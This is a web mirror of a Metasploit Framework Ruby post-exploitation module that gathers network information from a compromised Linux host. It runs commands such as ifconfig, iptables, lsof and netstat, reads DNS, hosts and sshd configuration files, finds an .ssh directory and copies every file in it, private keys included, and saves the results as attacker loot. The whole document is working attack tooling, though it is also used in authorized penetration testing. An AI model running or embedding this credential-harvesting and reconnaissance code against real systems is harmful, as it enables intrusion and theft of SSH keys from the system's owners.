Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/linux/gather/enum_network.rb
19566 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Post::Linux::Priv

9
  include Msf::Post::Linux::System

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Linux Gather Network Information',

16
        'Description' => %q{

17
          This module gathers network information from the target system

18
          IPTables rules, interfaces, wireless information, open and listening

19
          ports, active network connections, DNS information and SSH information.

20
        },

21
        'License' => MSF_LICENSE,

22
        'Author' => [

23
          'ohdae <bindshell[at]live.com>', # minor additions, modifications & testing

24
          'Stephen Haywood <averagesecurityguy[at]gmail.com>', # enum_linux

25
        ],

26
        'Platform' => ['linux'],

27
        'SessionTypes' => ['shell', 'meterpreter'],

28
        'Notes' => {

29
          'Stability' => [CRASH_SAFE],

30
          'SideEffects' => [],

31
          'Reliability' => []

32
        }

33
      )

34
    )

35
  end

36


37
  # Run Method for when run command is issued

38
  def run

39
    print_status("Running module against #{get_hostname} (#{session.session_host})")

40


41
    user = execute('/usr/bin/whoami')

42
    print_status("Module running as #{user}")

43


44
    # Collect data

45
    distro = get_sysinfo

46
    print_good('Info:')

47
    print_good("\t#{distro[:version]}")

48
    print_good("\t#{distro[:kernel]}")

49


50
    print_status('Collecting data...')

51


52
    nconfig = execute('/sbin/ifconfig -a')

53
    routes = execute('/sbin/route -e')

54
    iptables = execute('/sbin/iptables -L')

55
    iptables_nat = execute('/sbin/iptables -L -t nat')

56
    iptables_man = execute('/sbin/iptables -L -t mangle')

57
    resolv = cat_file('/etc/resolv.conf')

58
    sshd_conf = cat_file('/etc/ssh/sshd_config')

59
    hosts = cat_file('/etc/hosts')

60
    connections = execute('/usr/bin/lsof -nPi')

61
    wireless = execute('/sbin/iwconfig')

62
    open_ports = execute('/bin/netstat -tulpn')

63
    updown = execute('ls -R /etc/network')

64


65
    ssh_keys = get_ssh_keys

66


67
    # Save Enumerated data

68
    save('Network config', nconfig)

69
    save('Route table', routes)

70
    save('Firewall config', iptables.to_s + iptables_nat.to_s + iptables_man.to_s)

71
    save('DNS config', resolv)

72
    save('SSHD config', sshd_conf)

73
    save('Host file', hosts)

74
    save('SSH keys', ssh_keys) unless ssh_keys.empty?

75
    save('Active connections', connections)

76
    save('Wireless information', wireless)

77
    save('Listening ports', open_ports)

78
    save('If-Up/If-Down', updown)

79
  end

80


81
  # Save enumerated data

82
  def save(msg, data, ctype = 'text/plain')

83
    unless data && !data.empty?

84
      print_bad("Unable to get data for #{msg}")

85
      return

86
    end

87
    ltype = 'linux.enum.network'

88
    loot = store_loot(ltype, ctype, session, data, nil, msg)

89
    print_good("#{msg} stored in #{loot}")

90
  end

91


92
  def execute(cmd)

93
    verification_token = Rex::Text.rand_text_alpha(8)

94
    vprint_status("Execute: #{cmd}")

95
    output = cmd_exec(cmd + " || echo #{verification_token}")

96
    return nil if output.include?(verification_token)

97


98
    return output

99
  end

100


101
  def cat_file(filename)

102
    vprint_status("Download: #{filename}")

103
    output = read_file(filename)

104
    return output

105
  end

106


107
  def get_ssh_keys

108
    keys = []

109


110
    # Look for .ssh folder, "~/" might not work everytime

111
    vprint_status('Execute: /usr/bin/find / -maxdepth 3 -name .ssh')

112
    dirs = cmd_exec('/usr/bin/find / -maxdepth 3 -name .ssh').split("\n")

113
    ssh_base = ''

114
    dirs.each do |d|

115
      if d =~ %r{(^/)(.*)\.ssh$}

116
        ssh_base = d

117
        break

118
      end

119
    end

120


121
    # We didn't find .ssh :-(

122
    return [] if ssh_base == ''

123


124
    # List all the files under .ssh/

125
    files = execute("/bin/ls -a #{ssh_base}").chomp.split

126


127
    files.each do |k|

128
      next if k =~ /^(\.+)$/

129


130
      this_key = cat_file("#{ssh_base}/#{k}")

131
      keys << this_key

132
    end

133


134
    return keys

135
  end

136
end

137


138